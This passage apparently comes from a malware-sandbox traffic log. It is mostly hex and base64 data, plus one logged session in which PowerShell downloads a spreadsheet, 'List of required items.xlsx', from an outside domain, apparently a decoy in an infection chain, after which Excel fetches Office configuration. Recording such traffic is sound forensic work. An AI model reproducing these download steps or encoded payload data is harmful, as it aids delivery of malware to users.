                                                                                                        2024-12-09 12:48:26 UTC16384INData Raw: 71 48 30 55 4e 31 45 63 4c 37 32 67 63 48 51 62 74 50 52 45 31 31 79 55 42 78 39 49 48 54 2b 61 4c 75 54 6b 6c 50 69 68 65 66 4d 4d 76 33 57 2b 62 76 46 57 62 2b 35 38 33 65 43 76 55 54 65 63 72 69 6a 50 46 4d 46 6e 4c 62 73 6b 63 43 32 6d 67 50 36 4c 35 76 33 49 52 4f 6c 32 47 53 67 46 77 59 41 69 4a 53 6b 62 4c 53 55 6d 56 55 6f 62 4b 5a 4a 39 49 53 6d 53 66 53 45 70 6b 6e 33 71 61 43 75 4e 36 41 7a 35 67 70 6e 4d 6a 72 63 4b 7a 51 49 41 36 4d 46 76 48 43 77 61 44 37 37 71 46 37 61 71 39 57 34 33 4d 44 73 2b 62 54 54 47 38 54 56 37 4c 75 36 68 36 43 45 70 6b 6e 30 68 4b 5a 4a 39 49 53 6d 53 73 69 37 6a 67 34 6c 4f 59 4c 58 70 4e 44 4f 42 7a 41 75 71 42 4b 47 6a 57 47 38 4a 71 49 68 66 4e 45 72 68 4c 57 43 74 52 76 52 53 46 67 43 74 39 6d 77 31 4b 41 51
                                                                                                        Data Ascii: qH0UN1EcL72gcHQbtPRE11yUBx9IHT+aLuTklPihefMMv3W+bvFWb+583eCvUTecrijPFMFnLbskcC2mgP6L5v3IROl2GSgFwYAiJSkbLSUmVUobKZJ9ISmSfSEpkn3qaCuN6Az5gpnMjrcKzQIA6MFvHCwaD77qF7aq9W43MDs+bTTG8TV7Lu6h6CEpkn0hKZJ9ISmSsi7jg4lOYLXpNDOBzAuqBKGjWG8JqIhfNErhLWCtRvRSFgCt9mw1KAQ
                                                                                                        2024-12-09 12:48:26 UTC16384INData Raw: 76 6f 75 71 75 62 47 41 4d 34 39 71 70 71 54 2b 79 72 4d 42 6f 64 69 30 4f 57 36 74 78 71 75 47 78 66 6c 76 6a 36 6c 76 43 58 71 74 62 69 4b 67 42 70 73 52 56 2b 72 43 78 54 77 6f 36 59 51 55 6b 77 46 7a 61 78 77 31 37 6c 53 61 77 2b 47 6f 79 4a 74 38 76 45 2b 72 76 56 30 78 53 7a 69 59 68 75 53 6f 49 30 71 64 44 31 4e 2f 4b 71 55 43 4d 4e 48 61 66 65 77 43 35 6c 56 4b 6e 2f 47 31 61 32 32 70 42 46 68 4b 5a 64 66 6f 66 53 53 6c 7a 63 6f 76 6d 2f 41 70 79 6b 53 6f 59 4c 6b 44 49 6e 50 38 34 35 38 37 50 6c 71 67 71 49 49 32 6f 35 70 51 42 56 4d 50 70 47 2b 62 4b 68 6a 4f 76 30 46 54 65 36 41 48 4e 79 4d 70 6b 76 54 62 4a 70 4a 76 68 69 6d 53 66 53 45 70 6b 6e 30 68 4b 5a 4a 39 39 4a 39 66 50 59 5a 6e 2b 4e 6d 4e 52 7a 4b 76 4a 45 6f 64 5a 76 72 41 57 41 6c
                                                                                                        Data Ascii: vouqubGAM49qpqT+yrMBodi0OW6txquGxflvj6lvCXqtbiKgBpsRV+rCxTwo6YQUkwFzaxw17lSaw+GoyJt8vE+rvV0xSziYhuSoI0qdD1N/KqUCMNHafewC5lVKn/G1a22pBFhKZdfofSSlzcovm/ApykSoYLkDInP84587PlqgqII2o5pQBVMPpG+bKhjOv0FTe6AHNyMpkvTbJpJvhimSfSEpkn0hKZJ99J9fPYZn+NmNRzKvJEodZvrAWAl
                                                                                                        2024-12-09 12:48:26 UTC16384INData Raw: 53 48 2f 71 4a 51 2b 51 65 79 45 63 32 68 68 61 4b 5a 42 62 54 72 66 37 61 61 47 6d 46 32 51 6a 4b 5a 4c 32 76 44 43 51 66 53 45 6d 6b 71 58 6b 4b 5a 4a 39 49 53 6d 53 66 53 45 70 6b 6e 33 78 51 69 34 6d 5a 56 46 30 78 46 30 42 51 53 6d 6e 34 31 47 54 4b 4c 6b 70 2b 4e 65 6a 57 68 66 4e 45 67 57 4e 70 61 4c 4a 56 58 61 57 4f 61 6e 4a 73 42 4f 53 64 6c 77 45 66 61 44 75 68 6a 6c 72 57 78 4f 53 53 59 73 4f 64 6e 4b 31 47 35 34 6f 45 67 2f 35 34 56 57 48 30 4c 5a 38 41 47 32 6f 45 79 55 76 57 78 59 56 34 38 63 75 73 54 65 43 75 32 45 72 39 5a 67 6a 2f 46 78 5a 49 55 38 68 4b 5a 33 79 6c 4e 4b 52 66 58 6f 52 55 43 4c 6e 61 6f 34 48 37 53 62 66 36 31 33 4f 73 61 31 35 4d 7a 36 67 76 51 4d 2b 6e 63 70 79 63 78 54 73 38 4f 45 4a 46 6e 33 33 6c 4b 46 61 6a 69 71
                                                                                                        Data Ascii: SH/qJQ+QeyEc2hhaKZBbTrf7aaGmF2QjKZL2vDCQfSEmkqXkKZJ9ISmSfSEpkn3xQi4mZVF0xF0BQSmn41GTKLkp+NejWhfNEgWNpaLJVXaWOanJsBOSdlwEfaDuhjlrWxOSSYsOdnK1G54oEg/54VWH0LZ8AG2oEyUvWxYV48cusTeCu2Er9Zgj/FxZIU8hKZ3ylNKRfXoRUCLnao4H7Sbf613Osa15Mz6gvQM+ncpycxTs8OEJFn33lKFajiq
                                                                                                        2024-12-09 12:48:26 UTC16384INData Raw: 46 68 61 6e 48 59 49 4d 67 4c 37 34 56 49 77 64 74 4b 74 6f 44 30 70 37 58 71 71 71 4b 35 6c 58 4e 39 48 38 46 51 33 52 39 39 2f 79 58 6c 43 6a 58 32 66 42 63 45 76 63 2f 71 61 6a 39 6d 78 44 39 53 74 37 38 70 64 4b 49 45 65 35 39 30 77 56 4e 2f 68 43 76 64 77 54 65 51 57 58 4a 53 5a 68 65 69 6b 30 49 52 49 44 2f 4d 70 51 46 30 55 67 71 47 45 65 6c 62 51 37 2f 4e 4a 62 67 41 57 79 71 47 47 38 2f 4d 34 34 4c 62 32 67 63 6e 77 35 74 42 61 38 55 7a 73 63 64 37 32 54 67 71 62 34 50 6f 79 50 5a 76 68 59 6d 63 42 30 59 65 4e 6e 63 44 64 45 70 63 54 4b 47 78 6a 72 79 66 53 63 31 70 4e 39 49 5a 5a 74 51 4e 56 33 6e 58 78 38 4b 5a 4a 39 49 53 6d 53 66 53 45 70 6b 6e 30 68 39 56 4e 6e 57 4e 48 75 51 34 5a 4e 53 4b 56 33 47 66 47 61 6c 65 34 54 69 76 66 56 44 61 73
                                                                                                        Data Ascii: FhanHYIMgL74VIwdtKtoD0p7XqqqK5lXN9H8FQ3R99/yXlCjX2fBcEvc/qaj9mxD9St78pdKIEe590wVN/hCvdwTeQWXJSZheik0IRID/MpQF0UgqGEelbQ7/NJbgAWyqGG8/M44Lb2gcnw5tBa8Uzscd72Tgqb4PoyPZvhYmcB0YeNncDdEpcTKGxjryfSc1pN9IZZtQNV3nXx8KZJ9ISmSfSEpkn0h9VNnWNHuQ4ZNSKV3GfGale4TivfVDas
                                                                                                        2024-12-09 12:48:26 UTC16384INData Raw: 71 4b 45 6f 63 47 45 6b 2f 46 78 56 65 37 77 68 4b 5a 33 35 62 2b 74 74 67 71 41 61 70 2f 76 62 50 61 71 38 70 4f 4e 56 2b 4b 49 6f 6b 6e 31 6f 41 54 51 55 6f 4b 77 52 66 43 45 70 56 32 44 30 36 68 61 6e 6f 4a 77 52 66 43 45 70 52 64 6d 61 7a 52 61 42 6f 4b 77 52 66 43 45 70 75 47 41 65 48 39 47 43 72 4b 71 54 66 53 46 63 5a 66 6e 47 61 6c 56 2b 72 6a 63 75 6a 52 6a 6f 71 6f 4f 67 47 6a 70 6b 50 69 30 54 54 6d 2b 36 50 7a 79 67 47 6b 6c 6a 68 6b 69 72 70 2b 61 73 65 6e 77 68 4b 55 32 56 47 54 45 54 79 4d 6b 6f 6b 6e 32 43 39 33 31 4b 6f 4a 78 36 66 43 45 70 31 53 63 34 63 52 50 34 79 53 69 53 66 65 6d 36 6f 2f 57 6b 34 74 47 43 72 4d 47 54 66 53 46 63 5a 34 72 69 36 36 69 47 59 6d 70 56 66 6c 76 67 43 7a 47 67 41 6b 56 45 50 7a 77 54 66 71 2b 41 39 39 57
                                                                                                        Data Ascii: qKEocGEk/FxVe7whKZ35b+ttgqAap/vbPaq8pONV+KIokn1oATQUoKwRfCEpV2D06hanoJwRfCEpRdmazRaBoKwRfCEpuGAeH9GCrKqTfSFcZfnGalV+rjcujRjoqoOgGjpkPi0TTm+6PzygGkljhkirp+asenwhKU2VGTETyMkokn2C931KoJx6fCEp1Sc4cRP4ySiSfem6o/Wk4tGCrMGTfSFcZ4ri66iGYmpVflvgCzGgAkVEPzwTfq+A99W
                                                                                                        2024-12-09 12:48:27 UTC16384INData Raw: 71 4b 5a 5a 31 66 47 36 6a 55 63 51 53 78 76 57 36 4a 52 47 6f 43 32 32 67 64 53 51 4e 2f 77 4e 44 57 66 5a 67 77 78 36 4d 47 55 71 6b 6f 76 69 70 4d 6e 30 70 49 36 54 66 53 47 67 61 69 32 71 72 44 56 38 49 53 6b 53 67 35 65 67 46 33 38 6a 4b 5a 4c 30 2b 58 6b 5a 2b 43 4d 72 6b 6e 32 67 56 4f 59 69 7a 69 6d 53 63 71 79 66 4d 49 4c 65 77 56 64 4e 49 69 6b 62 36 50 63 6f 6b 6e 32 6c 38 53 67 50 70 30 49 33 2b 63 78 50 46 37 53 67 32 79 39 65 77 42 56 6c 76 67 66 2f 65 6a 4b 67 77 35 43 47 77 64 55 54 6a 2b 79 6a 4f 2b 47 6c 31 63 44 32 74 50 2b 54 66 53 48 42 50 6a 49 69 4b 52 76 6f 6e 79 69 53 66 61 6a 72 77 49 76 6c 66 42 6e 6f 6e 79 69 53 66 52 6e 4d 39 45 54 72 77 55 31 56 49 43 6b 62 79 4a 55 6f 6b 6e 32 66 58 4e 2f 32 67 71 31 51 2f 4e 63 53 49 6a 39
                                                                                                        Data Ascii: qKZZ1fG6jUcQSxvW6JRGoC22gdSQN/wNDWfZgwx6MGUqkovipMn0pI6TfSGgai2qrDV8ISkSg5egF38jKZL0+XkZ+CMrkn2gVOYizimScqyfMILewVdNIikb6Pcokn2l8SgPp0I3+cxPF7Sg2y9ewBVlvgf/ejKgw5CGwdUTj+yjO+Gl1cD2tP+TfSHBPjIiKRvonyiSfajrwIvlfBnonyiSfRnM9ETrwU1VICkbyJUokn2fXN/2gq1Q/NcSIj9
                                                                                                        2024-12-09 12:48:27 UTC16384INData Raw: 6b 44 49 2b 50 72 73 54 6a 49 32 58 6b 57 47 67 32 4a 6b 65 6f 51 55 54 6c 4b 38 72 61 4e 6d 67 77 47 66 74 67 39 51 62 52 47 30 43 6f 35 6e 65 6f 34 6d 42 48 46 42 79 68 65 72 38 52 51 32 43 2f 67 77 4c 6a 6b 67 55 7a 43 51 6a 38 54 47 48 6a 32 36 6a 44 73 47 30 56 77 6f 42 6a 69 53 71 61 5a 34 76 6d 37 6c 4a 4b 65 69 6f 59 42 47 34 39 6f 58 38 34 30 65 47 5a 64 32 6f 59 42 64 33 69 6b 67 75 76 61 42 78 66 44 4b 30 39 45 54 57 56 4a 39 32 4e 37 46 53 6e 6f 69 61 39 37 68 73 75 4c 55 6c 2f 31 41 72 76 46 78 39 77 6a 41 72 35 47 45 38 6d 55 52 4c 7a 43 38 2b 78 52 75 67 30 2b 66 66 65 71 68 6f 6c 50 44 53 39 43 66 74 4f 43 72 5a 68 62 31 41 50 33 6d 33 73 4e 39 6f 2b 6c 65 62 42 6a 71 75 37 37 47 62 4b 75 62 56 57 78 6e 79 4b 53 47 53 66 61 68 68 73 76 61
                                                                                                        Data Ascii: kDI+PrsTjI2XkWGg2JkeoQUTlK8raNmgwGftg9QbRG0Co5neo4mBHFByher8RQ2C/gwLjkgUzCQj8TGHj26jDsG0VwoBjiSqaZ4vm7lJKeioYBG49oX840eGZd2oYBd3ikguvaBxfDK09ETWVJ92N7FSnoia97hsuLUl/1ArvFx9wjAr5GE8mURLzC8+xRug0+ffeqholPDS9CftOCrZhb1AP3m3sN9o+lebBjqu77GbKubVWxnyKSGSfahhsva
                                                                                                        2024-12-09 12:48:27 UTC16384INData Raw: 72 48 70 2f 52 75 58 6e 4e 74 37 41 62 58 51 5a 4e 56 54 5a 4e 36 59 37 54 30 79 55 51 55 31 36 37 6e 5a 50 32 39 58 45 6e 6f 42 6a 4b 78 43 58 4a 35 61 57 62 71 78 36 66 30 62 6c 35 7a 62 65 77 47 31 30 47 54 56 55 32 54 65 6d 4f 30 39 4d 6c 45 46 4e 65 75 35 32 54 39 76 56 78 50 7a 57 43 4f 57 39 54 71 68 6c 66 71 45 54 52 30 54 62 6f 69 39 62 49 79 6d 53 63 71 57 42 62 34 4c 65 72 45 6e 35 33 4b 4b 75 62 4e 66 76 46 50 7a 66 4e 53 77 64 51 68 4c 75 57 53 6b 6d 46 78 58 65 31 6d 32 4c 34 4f 4d 62 2b 44 34 72 6b 6e 33 4b 46 63 50 39 53 73 44 6f 36 67 48 2b 39 74 37 32 61 2f 2b 4f 51 52 62 44 67 52 4e 68 33 4f 30 39 33 2f 65 74 63 73 6d 42 6f 6e 43 70 2b 5a 52 62 76 72 4b 71 52 59 70 46 50 30 7a 61 38 6b 4a 77 31 61 41 31 62 37 6d 4f 69 30 54 35 77 5a 30
                                                                                                        Data Ascii: rHp/RuXnNt7AbXQZNVTZN6Y7T0yUQU167nZP29XEnoBjKxCXJ5aWbqx6f0bl5zbewG10GTVU2TemO09MlEFNeu52T9vVxPzWCOW9TqhlfqETR0Tboi9bIymScqWBb4LerEn53KKubNfvFPzfNSwdQhLuWSkmFxXe1m2L4OMb+D4rkn3KFcP9SsDo6gH+9t72a/+OQRbDgRNh3O093/etcsmBonCp+ZRbvrKqRYpFP0za8kJw1aA1b7mOi0T5wZ0
                                                                                                        2024-12-09 12:48:27 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 79 6b 68 6f 2b 71 55 6f 54 6a 73 71 2f 64 4e 65 67 36 6b 51 4e 73 42 38 62 64 71 41 62 77 46 66 61 55 63 63 73 78 66 64 33 55 72 4c 67 73 63 6e 6d 61 31 55 64 32 39 36 4e 59 32 56 41 44 65 42 75 30 6b 37 54 57 6d 58 6e 51 57 63 51 77 66 64 4c 52 44 52 75 41 54 31 70 48 4d 34 54 7a 69 59 6b 75 4d 6c 34 53 75 57 4d 6c 46 64 44 36 53 49
                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABykho+qUoTjsq/dNeg6kQNsB8bdqAbwFfaUccsxfd3UrLgscnma1Ud296NY2VADeBu0k7TWmXnQWcQwfdLRDRuAT1pHM4TziYkuMl4SuWMlFdD6SI


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.84971093.95.216.1754436880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:48:42 UTC195OUTGET /ab/List%20of%20required%20items.xlsx HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                        Host: www.fornid.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-09 12:48:42 UTC347INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:48:42 GMT
                                                                                                        Server: Apache
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Last-Modified: Tue, 03 Dec 2024 04:19:39 GMT
                                                                                                        ETag: "20426a6-1fa6-62855f93d23a9"
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 8102
                                                                                                        Vary: Accept-Encoding
                                                                                                        Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
                                                                                                        2024-12-09 12:48:42 UTC7845INData Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 62 ee 9d 68 5e 01 00 00 90 04 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii: PK!bh^[Content_Types].xml (
                                                                                                        2024-12-09 12:48:42 UTC257INData Raw: d3 85 02 00 00 b1 05 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 00 78 6c 2f 73 74 79 6c 65 73 2e 78 6d 6c 50 4b 01 02 2d 00 14 00 06 00 08 00 00 00 21 00 0e ea cc 7e 10 02 00 00 a2 05 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 96 15 00 00 78 6c 2f 77 6f 72 6b 73 68 65 65 74 73 2f 73 68 65 65 74 31 2e 78 6d 6c 50 4b 01 02 2d 00 14 00 06 00 08 00 00 00 21 00 a7 0a e4 bd 3d 01 00 00 57 02 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 17 00 00 64 6f 63 50 72 6f 70 73 2f 63 6f 72 65 2e 78 6d 6c 50 4b 01 02 2d 00 14 00 06 00 08 00 00 00 21 00 de 41 16 d9 8a 01 00 00 11 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 50 1a 00 00 64 6f 63 50 72 6f 70 73 2f 61 70 70 2e 78 6d 6c 50 4b 05 06 00 00 00 00 0a 00 0a 00 80 02 00 00 10 1d 00 00
                                                                                                        Data Ascii: xl/styles.xmlPK-!~xl/worksheets/sheet1.xmlPK-!=WdocProps/core.xmlPK-!APdocProps/app.xmlPK


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.84971652.113.195.1324436028C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:48:52 UTC851OUTGET /config/v2/Office/excel/16.0.16827.20130/Production/CC?&EcsCanary=1&Clientid=%7bCA59C53D-E458-431B-8ED4-330B89EFBD36%7d&Application=excel&Platform=win32&Version=16.0.16827.20130&MsoVersion=16.0.16827.20130&ProcessName=excel.exe&Audience=Production&Build=ship&Architecture=x86&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=7&LicenseSKU=ProPlus2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7b37D1865E-0A26-4CC7-9FFF-2EA6E5257DBE%7d&LabMachine=false HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        If-None-Match: "enTcjZgT68gctiEaeAXTjCZ0zq0sZZUNL0VDwz0IJG8="
                                                                                                        User-Agent: Microsoft Office 2014
                                                                                                        DisableExperiments: false
                                                                                                        X-ECS-Client-Last-Telemetry-Events: ecs_client_library_name=MSO,ecs_client_app_name=Office,ecs_client_version=16.0.16827.20130
                                                                                                        Host: ecs.office.com
                                                                                                        2024-12-09 12:48:53 UTC847INHTTP/1.1 200 OK
                                                                                                        Cache-Control: no-cache,max-age=14400
                                                                                                        Content-Length: 148829
                                                                                                        Content-Type: application/json
                                                                                                        Expires: Mon, 09 Dec 2024 16:48:53 GMT
                                                                                                        ETag: "2yZqOs2IBZxmA0MDZeM7GacJRzvnQOSpMYlmGo6aE+I="
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: DENY
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                        Report-To: {"group":"NelEcsUpload1","max_age":604800,"endpoints":[{"url":"https://ecs.nel.measure.office.net?TenantId=Office&DestinationEndpoint=Edge-Prod-BL2r8a&FrontEnd=AFD"}],"include_subdomains":true}
                                                                                                        NEL: {"report_to":"NelEcsUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                        X-MSEdge-Ref: Ref A: 8E0FE369E39D44ED8B3816E3DDEF6A24 Ref B: BL2AA2010203053 Ref C: 2024-12-09T12:48:52Z
                                                                                                        Date: Mon, 09 Dec 2024 12:48:52 GMT
                                                                                                        Connection: close
                                                                                                        2024-12-09 12:48:53 UTC3206INData Raw: 7b 22 45 43 53 22 3a 7b 22 43 6f 6e 66 69 67 4c 6f 67 54 61 72 67 65 74 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 63 37 32 65 61 32 38 37 2d 65 64 37 37 2d 34 66 61 36 2d 61 34 38 30 2d 33 37 31 32 34 30 36 63 33 36 37 65 22 3a 22 61 6b 61 2e 6d 73 2f 45 63 73 43 61 6e 61 72 79 22 2c 22 43 61 63 68 65 45 78 70 69 72 79 49 6e 4d 69 6e 22 3a 32 34 30 2c 22 45 6e 61 62 6c 65 53 6d 61 72 74 45 54 61 67 22 3a 31 2c 22 43 6f 6e 66 69 67 49 64 44 65 6c 69 6d 69 74 65 72 49 6e 4c 6f 67 22 3a 22 3b 22 7d 2c 22 4e 61 6e 63 79 4f 66 66 69 63 65 54 65 61 6d 22 3a 7b 22 7a 68 65 74 61 6e 34 31 32 32 30 32 31 22 3a 74 72 75 65 7d 2c 22 4f 66 66 69 63 65 5f 41 63 63 65 73 73 22 3a 7b 22 55 73 65 46 6f 72 6d 54 68 65 6d 65 49 66 4e 6f 50 61 72 65 6e 74 53 65 63 74 69 6f 6e
                                                                                                        Data Ascii: {"ECS":{"ConfigLogTarget":"default","c72ea287-ed77-4fa6-a480-3712406c367e":"aka.ms/EcsCanary","CacheExpiryInMin":240,"EnableSmartETag":1,"ConfigIdDelimiterInLog":";"},"NancyOfficeTeam":{"zhetan4122021":true},"Office_Access":{"UseFormThemeIfNoParentSection
                                                                                                        2024-12-09 12:48:53 UTC8192INData Raw: 32 6f 6f 67 64 63 70 41 6b 69 6d 36 5a 38 31 61 41 70 58 33 57 70 6f 70 4f 71 36 4a 51 71 69 71 71 69 4a 62 4f 79 34 68 36 4c 38 74 55 4f 6d 2f 4a 56 70 79 71 36 6f 59 71 2b 56 55 58 66 71 61 4c 76 56 56 46 63 46 53 32 70 6f 6d 56 56 39 46 79 53 49 6a 70 6a 56 77 4f 79 73 4a 52 37 4a 69 74 6a 6c 33 74 38 57 6b 4b 34 2f 62 6c 56 59 77 2b 33 73 32 48 6d 6e 79 54 67 2f 4c 55 54 6e 69 64 31 6c 34 41 58 6b 77 47 30 33 65 6c 6c 71 4f 59 7a 73 79 38 4b 5a 6a 75 53 41 49 79 56 2b 67 56 6f 59 77 42 4f 38 6a 55 74 68 6d 73 47 6b 75 70 64 4f 70 7a 53 41 42 77 75 36 42 4d 63 65 67 44 4e 75 71 50 50 6d 33 52 34 43 44 6f 30 75 65 6b 58 4e 46 4f 67 5a 6a 6a 55 69 6a 75 55 56 74 55 69 6d 50 30 50 6d 68 33 68 44 70 6b 4e 48 57 72 73 2f 6a 52 50 7a 2b 31 4c 30 4f 77 63 6c
                                                                                                        Data Ascii: 2oogdcpAkim6Z81aApX3WpopOq6JQqiqqiJbOy4h6L8tUOm/JVpyq6oYq+VUXfqaLvVVFcFS2pomVV9FySIjpjVwOysJR7Jitjl3t8WkK4/blVYw+3s2HmnyTg/LUTnid1l4AXkwG03ellqOYzsy8KZjuSAIyV+gVoYwBO8jUthmsGkupdOpzSABwu6BMcegDNuqPPm3R4CDo0uekXNFOgZjjUijuUVtUimP0Pmh3hDpkNHWrs/jRPz+1L0Owcl
                                                                                                        2024-12-09 12:48:53 UTC4289INData Raw: 6d 74 4f 6e 50 61 73 74 65 22 3a 74 72 75 65 2c 22 50 69 76 6f 74 54 61 62 6c 65 42 61 63 6b 77 61 72 64 73 43 6f 6d 70 42 75 73 42 61 72 22 3a 74 72 75 65 2c 22 4c 6f 61 64 46 72 6f 6d 53 74 72 65 61 6d 22 3a 74 72 75 65 2c 22 4e 65 77 43 75 73 74 6f 6d 41 75 74 6f 66 69 6c 74 65 72 44 69 61 6c 6f 67 22 3a 74 72 75 65 2c 22 4e 61 76 69 67 61 74 69 6f 6e 50 61 6e 65 2e 4f 62 6a 65 63 74 41 64 64 65 64 44 65 6c 65 74 65 64 45 76 65 6e 74 73 22 3a 74 72 75 65 2c 22 49 6d 61 67 65 57 6f 72 6b 73 68 65 65 74 46 75 6e 63 74 69 6f 6e 22 3a 74 72 75 65 2c 22 53 75 70 70 6f 72 74 44 61 74 61 46 72 6f 6d 50 69 63 74 75 72 65 4f 6e 57 69 6e 64 6f 77 73 22 3a 74 72 75 65 2c 22 49 6e 73 69 67 68 74 73 2e 55 73 65 54 61 62 6c 65 52 65 63 6f 4d 4c 22 3a 74 72 75 65 2c
                                                                                                        Data Ascii: mtOnPaste":true,"PivotTableBackwardsCompBusBar":true,"LoadFromStream":true,"NewCustomAutofilterDialog":true,"NavigationPane.ObjectAddedDeletedEvents":true,"ImageWorksheetFunction":true,"SupportDataFromPictureOnWindows":true,"Insights.UseTableRecoML":true,
                                                                                                        2024-12-09 12:48:53 UTC8192INData Raw: 72 63 65 48 74 74 70 73 4f 6e 52 65 73 70 6f 6e 73 65 22 3a 74 72 75 65 2c 22 57 6f 70 69 54 6f 6b 65 6e 54 69 6d 65 42 65 66 6f 72 65 52 65 66 72 65 73 68 49 6e 4d 69 6e 75 74 65 73 22 3a 32 2c 22 45 6e 61 62 6c 65 43 6c 6f 75 64 55 73 61 67 65 4d 65 74 72 69 63 73 41 70 69 22 3a 74 72 75 65 2c 22 44 6f 63 75 6d 65 6e 74 53 75 6d 6d 61 72 79 54 65 6c 65 6d 65 74 72 79 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 47 72 6f 75 70 46 65 61 74 75 72 65 22 3a 7b 22 41 64 64 43 6c 6f 63 6b 44 61 74 61 4f 6e 4c 61 62 65 6c 43 68 61 6e 67 65 73 22 3a 74 72 75 65 2c 22 41 64 64 43 6c 6f 63 6b 44 61 74 61 4f 6e 50 75 74 43 68 61 6e 67 65 73 22 3a 74 72 75 65 2c 22 48 79 70 65 72 6c 69 6e 6b 4f 70 65 6e 49 6e 22 3a 74 72 75 65 2c 22 50 72 6f 74 6f 63 6f 6c 48 61 6e
                                                                                                        Data Ascii: rceHttpsOnResponse":true,"WopiTokenTimeBeforeRefreshInMinutes":2,"EnableCloudUsageMetricsApi":true,"DocumentSummaryTelemetryEnabled":true,"GroupFeature":{"AddClockDataOnLabelChanges":true,"AddClockDataOnPutChanges":true,"HyperlinkOpenIn":true,"ProtocolHan
                                                                                                        2024-12-09 12:48:53 UTC8192INData Raw: 48 51 41 49 41 42 6b 41 47 6b 41 63 77 42 68 41 48 41 41 63 41 42 76 41 47 6b 41 62 67 42 30 41 47 55 41 5a 41 41 41 45 41 49 42 45 68 46 57 41 47 55 41 63 67 42 35 41 43 41 41 5a 41 42 70 41 48 4d 41 59 51 42 77 41 48 41 41 62 77 42 70 41 47 34 41 64 41 42 6c 41 47 51 41 41 41 42 4c 43 67 45 51 42 41 45 4b 45 41 49 42 45 6a 52 51 41 47 77 41 5a 51 42 68 41 48 4d 41 5a 51 41 67 41 48 51 41 5a 51 42 73 41 47 77 41 49 41 42 31 41 48 4d 41 49 41 42 74 41 47 38 41 63 67 42 6c 41 43 34 41 49 41 42 58 41 47 67 41 65 51 41 67 41 47 51 41 61 51 42 6b 41 43 41 41 65 51 42 76 41 48 55 41 49 41 42 6a 41 47 67 41 62 77 42 76 41 48 4d 41 5a 51 41 67 41 48 51 41 61 41 42 68 41 48 51 41 49 41 42 68 41 47 34 41 63 77 42 33 41 47 55 41 63 67 41 2f 41 41 41 41 41 41 42 77
                                                                                                        Data Ascii: HQAIABkAGkAcwBhAHAAcABvAGkAbgB0AGUAZAAAEAIBEhFWAGUAcgB5ACAAZABpAHMAYQBwAHAAbwBpAG4AdABlAGQAAABLCgEQBAEKEAIBEjRQAGwAZQBhAHMAZQAgAHQAZQBsAGwAIAB1AHMAIABtAG8AcgBlAC4AIABXAGgAeQAgAGQAaQBkACAAeQBvAHUAIABjAGgAbwBvAHMAZQAgAHQAaABhAHQAIABhAG4AcwB3AGUAcgA/AAAAAABw
